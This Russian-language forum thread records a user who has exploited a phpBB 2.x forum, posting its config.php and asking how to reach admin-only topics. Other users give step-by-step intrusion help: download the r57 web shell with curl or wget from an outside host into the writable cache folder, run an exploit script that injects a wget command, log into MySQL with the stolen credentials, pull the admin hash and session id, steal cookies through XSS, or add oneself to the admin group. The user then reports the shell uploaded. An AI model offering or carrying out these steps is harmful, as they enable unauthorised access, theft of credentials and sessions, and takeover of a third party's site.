C помощю эксплоита получил доступ к файлам форума. Работают команды cat, ls, uname, rm, echo, mkdir и т.д.

Содержимое файла config.php :


<?php


// phpBB 2.x auto-generated config file
// Do not change anything in this file!

$dbms = 'mysql';

$dbhost = 'localhost';
$dbname = 'xxx_forum';
$dbuser = 'xxx_forum';
$dbpasswd = 'xxx_password';

$table_prefix = 'phpbb_';

define('PHPBB_INSTALLED', true);

?>


Для меня главная цель, это посмотреть топики которые разрешены только Группе Администраторы. И ещё как подключится к базе mySQL имея данные с config.php? Сама ссылка стандартного типа: www.xxx.ru/forum/
Подскажите пожалуйсто какой должен быть следющий шаг?

Залить шелл, оттуда выудить через MySQL hash админа и его sid. Спокойно подменить cookies и смотреть.....

Самый простой способ лить в папку cаche, она на запись всегда разрешена. И curl почти везде есть.
Значит пробираешь pwd(узнаешь папку в которой ты находишся). И пишешь curl -o путь/cache/file.txt http://rst.void.ru/download/r57shell.txt .... А потом cp путь/cache/file.txt путь/cache/file.php , и идешь путь/cache/file.php

Все расписал подробнее нельзя.

Залить шелл, оттуда выудить через MySQL hash админа и его sid. Спокойно подменить cookies и смотреть.....

Залить шелл командой wget ?
т.е. пример будет такого типа:

perl phpbb.pl www.xxx.ru /forum/ 3128 "wget http://attack/shell.php"

Если да то обращение через браузер должен быть таким:

www.xxx.ru/forum/shell.php

?

команда PWD:
root@omega: pwd
--------------------------------

/usr/home/www/xxx/xxx/forum

хм... если просто смотреть админские разделы то зачем аж так парится? :) простая кся и по кукам админа заходишь ;) ну для могучих перцев можно и вправду залить шелл командой wget(или другой смотря что пашет) и узнавать хэш админа потом его разшифрововать.... кста а нах заливать шел чтоб лазить по мискле?
разве mysql -D -h -u -p ктонить отменял? :Р и вообще если тебе известно всё по мискле то по выше перечисленой команде можно и апдейтнуть себя и перевести в группу админов ;)

хм... если просто смотреть админские разделы то зачем аж так парится? :) простая кся и по кукам админа заходишь ;) ну для могучих перцев можно и вправду залить шелл командой wget(или другой смотря что пашет) и узнавать хэш админа потом его разшифрововать.... кста а нах заливать шел чтоб лазить по мискле?
разве mysql -D -h -u -p ктонить отменял? :Р и вообще если тебе известно всё по мискле то по выше перечисленой команде можно и апдейтнуть себя и перевести в группу админов ;)

В Мускуле не рабираюсь :( Проблема в этом... Если можете помочь стучите в асю пожалуйто - 317570777

Есть! Шелл р57 залит.

bl4ck-cat
ТЫ гений чтоли......
Каким макаром ты подменишь куки в версиях старше 2.0.12 и станешь при этом админом?
Научи я тоже так хочу.

Cnekmp
Набери ls -l посмотри какие еще папки доступны на запись.... около них будет написано drwxrwxrwx

Теперь с помощю шелла какой шаг нужно сделать?

perl phpbb.pl www.xxx.ru /forum/ 3128 "wget http://attack/shell.php"

Если да то обращение через браузер должен быть таким:

www.xxx.ru/forum/shell.php

да, да... ну а дальше если шелл зальешь то там уже разберешся... просто найди там панель управления базой и повводи все те данные про мисклю что ты раздобыл и юзай запросы к бд... хотя имхо если тебе просто читать разделы.. то проще юзнуть ксю... помоему жалобная кся там тоже пашет как и на ипб...

Диманыч
я не говорил что можно через подмену куков сделать себя админом О_о я дал 2 способа:
подменить свои куки на куки админа и заходить как этот админ
и 2 способ через мускуль добавить себя в админ группу О_о ведь если у тебя есть все данные про бд мускуля чем бы не поизменять там чего? о_О

Пожалуйстa bl4ck-cat свяжитесь со мной по аське 317570777 :)

простая кся и по кукам админа заходишь
А вот это ты что написал, или это опечатка?

Посмотреть директорию доступной для записи командой ls -la. Потом попробовать залить шелл с помощью качалок. Подцепиться к базе данныхимею хост пароль и логин.
Посмотреть хэш админа. Подставить к кукаам. Вуаля закрытые разделы а твоих глазах.

[-] ERROR! Can't select database

простая кся и по кукам админа заходишь
иммел ввиду стыреть куки и подставить вместо своих и заходить как админ у которого эти куки ;) просто написал сокращенно ;)

Cnekmp Имя базы введи, оно 3 строкой указано в config.php